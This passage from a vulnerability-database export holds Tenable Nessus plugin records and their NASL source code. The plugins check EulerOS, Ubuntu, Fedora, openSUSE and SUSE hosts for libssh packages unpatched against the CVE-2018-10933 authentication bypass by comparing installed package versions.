audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libssh-0.7.1-2.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssh\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-09-18T10:57:24", "description": "USN-3795-1 fixed a vulnerability in libssh. This update provides the\ncorresponding update for Ubuntu 18.10.\n\nPeter Winter-Smith discovered that libssh incorrectly handled\nauthentication when being used as a server. A remote attacker could\nuse this issue to bypass authentication without any credentials.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 15, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2018-10-23T00:00:00", "title": "Ubuntu 18.10 : libssh vulnerability (USN-3795-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "modified": "2018-10-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.10", "p-cpe:/a:canonical:ubuntu_linux:libssh-4"], "id": "UBUNTU_USN-3795-2.NASL", "href": "https://www.tenable.com/plugins/nessus/118325", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3795-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118325);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-10933\");\n script_xref(name:\"USN\", value:\"3795-2\");\n script_xref(name:\"IAVA\", value:\"2018-A-0347-S\");\n\n script_name(english:\"Ubuntu 18.10 : libssh vulnerability (USN-3795-2)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"USN-3795-1 fixed a vulnerability in libssh. This update provides the\ncorresponding update for Ubuntu 18.10.\n\nPeter Winter-Smith discovered that libssh incorrectly handled\nauthentication when being used as a server. A remote attacker could\nuse this issue to bypass authentication without any credentials.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3795-2/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected libssh-4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssh-4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.10\", pkgname:\"libssh-4\", pkgver:\"0.8.1-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssh-4\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-07T10:21:10", "description": "Update to version 0.8.4 to address CVE-2018-10933\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 14, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : libssh (2018-c08cd808d3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libssh", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-C08CD808D3.NASL", "href": "https://www.tenable.com/plugins/nessus/120760", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-c08cd808d3.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120760);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10933\");\n script_xref(name:\"FEDORA\", value:\"2018-c08cd808d3\");\n\n script_name(english:\"Fedora 28 : libssh (2018-c08cd808d3)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to version 0.8.4 to address CVE-2018-10933\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-c08cd808d3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"libssh-0.8.4-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssh\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-20T12:34:21", "description": "This update for libssh fixes the following security issue :\n\n - CVE-2018-10933: Fixed a server mode authentication\n bypass (boo#1108020).\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "edition": 15, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2018-10-22T00:00:00", "title": "openSUSE Security Update : libssh (openSUSE-2018-1207)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "modified": "2018-10-22T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libssh4-32bit", "p-cpe:/a:novell:opensuse:libssh-debugsource", "p-cpe:/a:novell:opensuse:libssh4-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libssh4-debuginfo", "p-cpe:/a:novell:opensuse:libssh4", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:libssh-devel"], "id": "OPENSUSE-2018-1207.NASL", "href": "https://www.tenable.com/plugins/nessus/118250", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1207.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118250);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-10933\");\n script_xref(name:\"IAVA\", value:\"2018-A-0347-S\");\n\n script_name(english:\"openSUSE Security Update : libssh (openSUSE-2018-1207)\");\n script_summary(english:\"Check for the openSUSE-2018-1207 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libssh fixes the following security issue :\n\n - CVE-2018-10933: Fixed a server mode authentication\n bypass (boo#1108020).\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1108020\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh4-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libssh4-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libssh-debugsource-0.6.3-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libssh-devel-0.6.3-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libssh4-0.6.3-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libssh4-debuginfo-0.6.3-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libssh4-32bit-0.6.3-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libssh4-debuginfo-32bit-0.6.3-17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssh-debugsource / libssh-devel / libssh4 / libssh4-32bit / etc\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-04-01T06:54:18", "description": "This update for libssh fixes the following issues :\n\nCVE-2018-10933: Fixed a server mode authentication bypass\n(bsc#1108020).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2019-01-02T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : libssh (SUSE-SU-2018:3162-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libssh4-debuginfo", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:libssh4-32bit-debuginfo", "p-cpe:/a:novell:suse_linux:libssh-devel", "p-cpe:/a:novell:suse_linux:libssh4", "p-cpe:/a:novell:suse_linux:libssh-debugsource"], "id": "SUSE_SU-2018-3162-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120131", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3162-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120131);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2018-10933\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : libssh (SUSE-SU-2018:3162-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libssh fixes the following issues :\n\nCVE-2018-10933: Fixed a server mode authentication bypass\n(bsc#1108020).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1108020\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10933/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183162-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d380265d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2018-2244=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libssh-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libssh4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libssh4-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libssh4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"x86_64\", reference:\"libssh4-32bit-0.7.5-6.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"x86_64\", reference:\"libssh4-32bit-debuginfo-0.7.5-6.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libssh-debugsource-0.7.5-6.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libssh-devel-0.7.5-6.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libssh4-0.7.5-6.3.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libssh4-debuginfo-0.7.5-6.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", cpu:\"x86_64\", reference:\"libssh4-32bit-0.7.5-6.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", cpu:\"x86_64\", reference:\"libssh4-32bit-debuginfo-0.7.5-6.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libssh-debugsource-0.7.5-6.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libssh-devel-0.7.5-6.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libssh4-0.7.5-6.3.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libssh4-debuginfo-0.7.5-6.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssh\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-07T10:18:43", "description": "Update to version 0.8.4 to fix CVE-2018-10933\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 14, "cvss3": {"score": 9.1, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2019-01-03T00:00:00", "title": "Fedora 29 : libssh (2018-6b390ceb36)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "modified": "2019-01-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:libssh"], "id": "FEDORA_2018-6B390CEB36.NASL", "href": "https://www.tenable.com/plugins/nessus/120502", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-6b390ceb36.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120502);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10933\");\n script_xref(name:\"FEDORA\", value:\"2018-6b390ceb36\");\n\n script_name(english:\"Fedora 29 : libssh (2018-6b390ceb36)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to version 0.8.4 to fix CVE-2018-10933\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-6b390ceb36\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libssh\");\n 